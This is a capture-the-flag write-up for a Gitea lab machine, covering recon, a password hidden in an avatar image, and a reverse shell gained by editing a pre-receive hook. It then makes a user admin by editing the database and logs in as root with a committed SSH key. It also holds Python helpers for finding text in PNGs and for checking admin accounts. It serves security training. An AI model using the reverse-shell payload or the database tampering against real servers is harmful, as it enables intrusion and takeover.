@ Animesh Roy | Sunday, Jul 4, 2021 | 3 minutes read | Update at Sunday, Jul 4, 2021

Git and Crumpets

Our devs have been clamoring for some centralized version control, so the admin came through. Rumour has it that they included a few countermeasures…

Task 01: Start the VM

Task 02: Git the flags


  • I tried running nmap first, but it turned up nothing useful.

  • Being impatient, I ran a quick curl command, curl -s 10.10.x.y, to see what was being served.


    The response points at the virtual host git.git-and-crumpets.thm, which does not resolve on our side yet, so name resolution is the next step.

  • Set up a DNS record locally by adding an entry to /etc/hosts:

    cat /etc/hosts
    10.10.x.y   git.git-and-crumpets.thm
    # this is enough for the browser and git to reach the instance by name
  • Register a new account on the Gitea instance.

  • Clone the repository:

    git clone http://git.git-and-crumpets.thm/scones/cant-touch-this.git
    # authenticate with the account you just registered
  • cd into the repository directory and run git log. The commit history reveals that the password is hidden somewhere in the "Avatar", and a quick strings command on the avatar image reveals it. Use these credentials to log in to the scones account.


    Let's try logging in with the email [email protected] and the password Password.

    Create a git hook (http://git.git-and-crumpets.thm/scones/cant-touch-this/settings/hooks/git). Server-side hooks run on the Gitea host as the git service user on every push, so being allowed to edit them is remote code execution. Edit the pre-receive hook to contain the following payload, or write your own:

    • Payload
    bash -i >& /dev/tcp/YOUR_IP/9001 0>&1 # change IP to your attacking machine
    • Start an nc listener on our machine

      nc -lvnp 9001
  • Now edit the README file (http://git.git-and-crumpets.thm/scones/cant-touch-this/_edit/master/ and click save. Saving through the web editor creates a commit, which triggers the pre-receive hook, and you should get a reverse shell:

    nc -lvnp 9001
    listening on [any] 9001 ...
    connect to [] from (UNKNOWN) [] 58472
    bash: cannot set terminal process group (886): Inappropriate ioctl for device
    bash: no job control in this shell
    [git@git-and-crumpets cant-touch-this.git]$ cat /home/git/user.txt   # returns the base64-encoded flag; decode it

    Decode the flag

    echo -n "EncodedText==" | base64 -d 

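The avatar step above relies on strings(1) stumbling over the secret. As an added example (my code, not part of the original write-up, and not what the room's avatar actually contains), the Python below walks a PNG's chunks so you can see where such text hides: in a tEXt chunk, or appended after the IEND chunk where image viewers never look. The image bytes, the comment and the password-like string are all constructed inline; chunk CRCs are written but not verified, since the point is locating data, not validating the image.

```python
# Added example: find where a password-like string sits inside a PNG, the way
# strings(1) would find it but with the location attached. The image and the
# secret below are constructed for the demo; they are not the room's avatar.
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_sample_png() -> bytes:
    """Constructed 1x1 PNG with a tEXt comment and bytes appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # width, height, bit depth, colour type, ...
    text = b"Comment\x00nothing to see here"
    png = PNG_SIG + png_chunk(b"IHDR", ihdr) + png_chunk(b"tEXt", text) + png_chunk(b"IEND", b"")
    return png + b"\n# password: Not-The-Real-One\n"  # hypothetical appended secret


def walk_png(blob: bytes):
    """Return ([(chunk_type, data), ...], trailing_bytes_after_IEND)."""
    if not blob.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    chunks = []
    while pos + 8 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        chunks.append((ctype.decode("ascii"), blob[pos + 8:pos + 8 + length]))
        pos += 12 + length  # header + data + CRC
        if ctype == b"IEND":
            break
    return chunks, blob[pos:]


def printable_strings(blob: bytes, min_len: int = 4) -> list:
    """What strings(1) does: runs of printable ASCII at least min_len long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def find_text(blob: bytes) -> dict:
    """Map each place text can hide (tEXt chunks, trailing data) to the strings found there."""
    chunks, trailing = walk_png(blob)
    found = {}
    for ctype, data in chunks:
        if ctype == "tEXt":
            found.setdefault("chunk:tEXt", []).extend(printable_strings(data))
    if trailing:
        found["after IEND"] = printable_strings(trailing)
    return found


if __name__ == "__main__":
    for where, strs in find_text(build_sample_png()).items():
        print(where, strs)
```

Point the same walker at a real avatar by reading the file into `blob`; anything reported under "after IEND" is data the PNG decoder ignores entirely, which is exactly the kind of place a careless admin (or a CTF author) leaves a note.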

  • Look at the Gitea database and make the account you registered an admin:

    [git@git-and-crumpets tmp]$ sqlite3 /var/lib/gitea/data/gitea.db
    update user set is_admin=1 where id=3;
    # id=3 is assumed to be the account registered earlier; confirm the id before updating rather than guessing
    # if you didn't upgrade your shell, the prompt may show a blank line. Don't worry about it.
  • Now, as an admin, you can see every repository on the instance, not just the scones account's (http://git.git-and-crumpets.thm/admin/repos).

  • Go to the backup repo, switch to the second branch, and look at its commits (http://git.git-and-crumpets.thm/root/backup/commits/branch/dotfiles).

  • One commit contains an OpenSSH private key (http://git.git-and-crumpets.thm/root/backup/commit/0b23539d97978fc83b763ef8a4b3882d16e71d32):


  • Copy the contents of the SSH key into a file named root.key, and restrict its permissions or ssh will refuse to use it:

    vi root.key    # paste the key
    chmod 400 root.key
  • Now log in and get the root flag:

    ssh -i root.key [email protected]
    The authenticity of host ' (' can't be established.
    ECDSA key fingerprint is SHA256:Tm4zUvVK5KsvOsFB2xvRHK4yg58piyOwURqB1Zr2tXI.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '' (ECDSA) to the list of known hosts.
    Enter passphrase for key 'root.key':    # the key is encrypted; the passphrase is Sup3rS3cur3
    [root@git-and-crumpets ~]# cat root.txt
  • Decode the flag

    echo -n "EncodedText==" | base64 -d 


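The database step above hardcodes id=3, which silently changes nothing if the ids are not what you assumed. As an added example (mine, not from the write-up or from Gitea itself), here is the same update keyed on the login name, run against a constructed in-memory subset of Gitea's user table, next to the query a defender would run over gitea.db to spot an admin that should not be there. The columns used (id, lower_name, name, is_admin) mirror Gitea's table; the accounts and the missing id are invented for the demo.

```python
# Added example: promote a Gitea account to admin by name instead of a guessed
# row id, and list who is an admin afterwards. The table is a constructed subset
# of Gitea's `user` table; the accounts are invented for the demo.
import sqlite3


def make_sample_db() -> sqlite3.Connection:
    """In-memory stand-in for /var/lib/gitea/data/gitea.db (constructed)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE user ("
        " id INTEGER PRIMARY KEY,"
        " lower_name TEXT NOT NULL,"
        " name TEXT NOT NULL,"
        " is_admin INTEGER NOT NULL DEFAULT 0)"
    )
    # id 3 is deliberately missing, as it would be if an account had been deleted,
    # so 'where id=3' updates nothing and sqlite3 prints nothing to say so.
    con.executemany(
        "INSERT INTO user (id, lower_name, name, is_admin) VALUES (?, ?, ?, ?)",
        [(1, "root", "root", 1), (2, "scones", "scones", 0), (4, "newuser", "NewUser", 0)],
    )
    con.commit()
    return con


def list_admins(con: sqlite3.Connection) -> list:
    """Defender's check: every account with is_admin set, by name."""
    rows = con.execute("SELECT name FROM user WHERE is_admin = 1 ORDER BY id")
    return [r[0] for r in rows]


def promote_by_id(con: sqlite3.Connection, uid: int) -> int:
    """The write-up's approach; returns rows changed (0 means the guess was wrong)."""
    cur = con.execute("UPDATE user SET is_admin = 1 WHERE id = ?", (uid,))
    con.commit()
    return cur.rowcount


def promote_by_name(con: sqlite3.Connection, name: str) -> int:
    """Same update keyed on the login name, which Gitea stores lower-cased in lower_name."""
    cur = con.execute("UPDATE user SET is_admin = 1 WHERE lower_name = ?", (name.lower(),))
    con.commit()
    return cur.rowcount


def unexpected_admins(con: sqlite3.Connection, expected: set) -> list:
    """Admins not on the expected list; what a periodic check over gitea.db should alert on."""
    return [n for n in list_admins(con) if n not in expected]


if __name__ == "__main__":
    db = make_sample_db()
    print("changed by id=3:", promote_by_id(db, 3))
    print("changed by name:", promote_by_name(db, "NewUser"))
    print("admins now:", list_admins(db))
    print("unexpected:", unexpected_admins(db, {"root"}))
```

On the real box the same statements go into the sqlite3 prompt from the write-up; the rowcount that sqlite3 hides is what `promote_by_id` returns here, which is why checking it (or selecting the row first) matters before you go looking for the admin pages.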